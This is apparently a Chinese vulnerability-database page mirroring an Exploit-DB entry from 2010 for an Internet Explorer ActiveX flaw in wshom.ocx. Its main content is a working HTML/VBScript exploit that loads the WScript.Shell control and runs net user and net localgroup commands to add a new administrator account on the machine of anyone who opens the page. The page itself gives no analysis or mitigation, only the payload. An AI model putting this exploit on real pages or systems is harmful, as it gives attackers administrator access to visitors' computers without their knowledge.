Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059078 漏洞类型
发布时间 2010-01-22 更新时间 2010-01-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11229
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
# Date: 22/01/2010
# Author: Stack
# Version: ALL
# Tested on: winsp2
<html>
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
></object>
<script language='vbscript'>

arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"

target.run arg1

</script></p>